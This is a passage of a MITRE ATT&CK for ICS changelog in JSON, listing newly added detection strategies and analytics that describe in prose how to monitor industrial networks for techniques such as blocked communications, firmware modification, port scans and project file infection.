                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--3f052beb-d384-4ebe-b942-2c4ddeb95833"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--feb80c7a-96cd-4300-b344-4d75b176c9cb",
                    "created": "2026-04-22T22:42:31.791Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0911",
                            "external_id": "DET0911"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:27:51.377Z",
                    "name": "Detection of Block Ethernet",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--df7f8849-56a7-4e83-9fd7-a4f25227d960"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--6f318bab-df4a-4a51-b849-e9c2ab2f9c4c",
                    "created": "2026-04-22T15:09:30.933Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0903",
                            "external_id": "DET0903"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:28:00.436Z",
                    "name": "Detection of Block Operational Technology Message",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--c556c91d-64a0-401c-9c41-18971eeca0f2"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--527668a3-cc0c-48c2-856a-a45615817366",
                    "created": "2026-04-22T22:56:48.997Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0912",
                            "external_id": "DET0912"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:28:13.555Z",
                    "name": "Detection of Block Wi-Fi",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--0b4e7cfa-9f9d-49b0-b5bf-afdf62058c5a"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--c4ddc0d7-0296-4d92-9ae1-1a4b7b5d1640",
                    "created": "2026-04-22T20:32:50.322Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0908",
                            "external_id": "DET0908"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:29:42.421Z",
                    "name": "Detection of Broadcast Discovery",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--f6324642-d17d-49d4-90b2-bab9d229d6fa"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--73773bb8-c63b-4d48-9b48-33440f12a514",
                    "created": "2026-04-22T15:56:01.514Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0904",
                            "external_id": "DET0904"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:30:02.969Z",
                    "name": "Detection of Firmware Modification",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--fc6641ac-5748-4498-89e9-d4ada2b6f88a"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--ff6456fc-576d-4da5-b561-b58f70961b15",
                    "created": "2026-04-22T16:29:50.802Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0905",
                            "external_id": "DET0905"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:30:16.130Z",
                    "name": "Detection of Insecure Credentials",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--1017530e-423d-4857-80b6-99891bf82d28"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--56bf71a3-a28b-4a8f-84ed-3a71449d47c0",
                    "created": "2026-04-22T20:46:31.212Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0909",
                            "external_id": "DET0909"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:30:28.263Z",
                    "name": "Detection of Multicast Discovery",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--67861309-0ba7-4713-843e-3def87e396ec"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--c1645705-a26f-45b2-aa68-ff5c93dfc0f4",
                    "created": "2026-04-23T00:43:15.974Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0915",
                            "external_id": "DET0915"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:30:40.347Z",
                    "name": "Detection of Online Edit",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--22b202f2-d4dd-44dd-b5e1-791ff2aef8ed"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--6bdde391-76eb-4bd7-9e19-e805ab98b7ac",
                    "created": "2026-04-22T18:52:19.941Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0907",
                            "external_id": "DET0907"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:30:52.373Z",
                    "name": "Detection of Port Scan",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--51a094bf-b7eb-452a-9b7a-ffac16fce1ac"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--e90f1c0c-f2c5-4fe1-942f-411574df043f",
                    "created": "2026-04-23T00:32:34.211Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0914",
                            "external_id": "DET0914"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:31:02.396Z",
                    "name": "Detection of Program Append",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--3c6aa6f7-29e9-41d9-8500-30b6d0533d64"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--2e99cd65-aad4-4796-9013-79837d498eb6",
                    "created": "2026-04-23T00:09:43.016Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0913",
                            "external_id": "DET0913"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:31:14.045Z",
                    "name": "Detection of Program Download All",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--e379be82-39d7-4ae4-8557-f846ba19cd4b"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--31773402-e407-4ed3-b86c-7a8587dc5ec9",
                    "created": "2026-04-22T17:55:10.734Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0906",
                            "external_id": "DET0906"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:31:24.570Z",
                    "name": "Detection of Siemens Project File Format Infection",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--6a510bf0-0289-4eb0-8645-89f0f4d32cf3"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                },
                {
                    "type": "x-mitre-detection-strategy",
                    "spec_version": "2.1",
                    "id": "x-mitre-detection-strategy--f487a605-0acb-4b12-b157-33b75ebd9a40",
                    "created": "2026-04-22T14:32:49.664Z",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0902",
                            "external_id": "DET0902"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "modified": "2026-04-24T20:31:37.796Z",
                    "name": "Detection of Unauthorized Message",
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_deprecated": false,
                    "x_mitre_version": "1.0",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_analytic_refs": [
                        "x-mitre-analytic--613b28ef-88dd-4008-8d7e-206ce55a7cde"
                    ],
                    "x_mitre_domains": [
                        "ics-attack"
                    ]
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        },
        "analytics": {
            "additions": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--613b28ef-88dd-4008-8d7e-206ce55a7cde",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 14:53:50.597000+00:00",
                    "modified": "2026-04-24 20:33:56.808000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0902#AN2045",
                            "external_id": "AN2045"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2045",
                    "description": "Unauthorized messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Unauthorized messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for benign reasons. Monitor messages for changes in how they are constructed.\n\nMonitor for anomalous or unexpected messages that may result in changes to the process operation observable via asset application logs (e.g., discrete write, logic and device configuration, mode changes, safety triggers).\n\nConsider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity which may precede this technique.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c556c91d-64a0-401c-9c41-18971eeca0f2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 15:07:57.495000+00:00",
                    "modified": "2026-04-24 20:34:00.942000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0903#AN2046",
                            "external_id": "AN2046"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2046",
                    "description": "Monitor for the termination of processes or services associated with ICS automation protocols and application software which could help detect blocked communications.\n\nMonitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique\u2019s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.\n\nMonitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.\n\nMonitor for a loss of network communications, which may indicate this technique is being used.\n\nMonitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages are blocked.\n\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--61f1d40e-f3d0-4cc6-aa2d-937b6204194f",
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e",
                            "name": "Databases",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--fc6641ac-5748-4498-89e9-d4ada2b6f88a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 15:53:18.404000+00:00",
                    "modified": "2026-04-24 20:34:04.333000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0904#AN2047",
                            "external_id": "AN2047"
                        },
                        {
                            "source_name": "McAfee CHIPSEC Blog",
                            "description": "Beek, C., Samani, R. (2017, March 8). CHIPSEC Support Against Vault 7 Disclosure Scanning. Retrieved March 13, 2017.",
                            "url": "https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/"
                        },
                        {
                            "source_name": "MITRE Copernicus",
                            "description": "Butterworth, J. (2013, July 30). Copernicus: Question Your Assumptions about BIOS Security. Retrieved December 11, 2015.",
                            "url": "http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about"
                        },
                        {
                            "source_name": "Intel HackingTeam UEFI Rootkit",
                            "description": "Intel Security. (2005, July 16). HackingTeam's UEFI Rootkit Details. Retrieved November 17, 2024.",
                            "url": "https://web.archive.org/web/20170313124421/http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html"
                        },
                        {
                            "source_name": "Github CHIPSEC",
                            "description": "Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.",
                            "url": "https://github.com/chipsec/chipsec"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2047",
                    "description": "Monitor for firmware changes which may be observable via operational alarms from devices.\n\nMonitor device application logs for firmware changes, although not all devices will produce such logs.\n\nMonitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.\n\nMonitor firmware for unexpected changes. Asset management systems should be consulted to understand known-good firmware versions. Dump and inspect BIOS images on vulnerable systems and compare against known good images.(Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. Likewise, EFI modules can be collected and compared against a known-clean list of EFI executable binaries to detect potentially malicious modules. The CHIPSEC framework can be used for analysis to determine if firmware modifications have been performed.(Citation: McAfee CHIPSEC Blog)(Citation: Github CHIPSEC)(Citation: Intel HackingTeam UEFI Rootkit)\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298",
                            "name": "Operational Databases",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "Application Log",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd",
                            "name": "Firmware",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Network Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1017530e-423d-4857-80b6-99891bf82d28",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 16:28:31.400000+00:00",
                    "modified": "2026-04-24 20:33:52.442000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0905#AN2048",
                            "external_id": "AN2048"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2048",
                    "description": "Monitor network traffic for insecure credential use in protocols that allow unencrypted authentication.\n\nMonitor logon sessions for insecure credential use, when feasible.\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9ce98c86-8d30-4043-ba54-0784d478d0b5",
                            "name": "Logon Session",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6a510bf0-0289-4eb0-8645-89f0f4d32cf3",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 17:53:18.908000+00:00",
                    "modified": "2026-04-24 20:33:57.629000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0906#AN2049",
                            "external_id": "AN2049"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2049",
                    "description": "Monitor for unexpected changes to project files, although if the malicious modification occurs in tandem with legitimate changes it will be difficult to isolate the unintended changes by analyzing only file systems modifications.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
                            "name": "File",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--51a094bf-b7eb-452a-9b7a-ffac16fce1ac",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 18:49:31.209000+00:00",
                    "modified": "2026-04-24 20:33:56.263000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0907#AN2050",
                            "external_id": "AN2050"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2050",
                    "description": "Monitor for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.\n\nMonitor for hosts enumerating network connected resources using non-ICS enterprise protocols.  \n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "Process",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "Network",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f6324642-d17d-49d4-90b2-bab9d229d6fa",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 20:31:39.088000+00:00",
                    "modified": "2026-04-24 20:34:03.863000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0908#AN2051",
                            "external_id": "AN2051"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2051",
                    "description": "Monitor for anomalies related to discovery related ICS functions, including devices that have not previously used these functions or for functions being sent to many outstations.\nMonitor for new ICS protocol connections to existing assets or for device scanning (i.e., a host connecting to many devices) over ICS and enterprise protocols (e.g., ICMP, DCOM, WinRM). For added context on adversary enterprise procedures and background see [Remote System Discovery](https://attack.mitre.org/techniques/T1018).\n",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c",
                            "name": "Traffic",
                            "channel": "None"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                            "name": "Network Traffic",
                            "channel": "None"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "None"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--67861309-0ba7-4713-843e-3def87e396ec",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-22 20:45:49.233000+00:00",
                    "modified": "2026-04-24 20:33:57.256000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0909#AN2052",
                            "external_id": "AN2052"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2052",
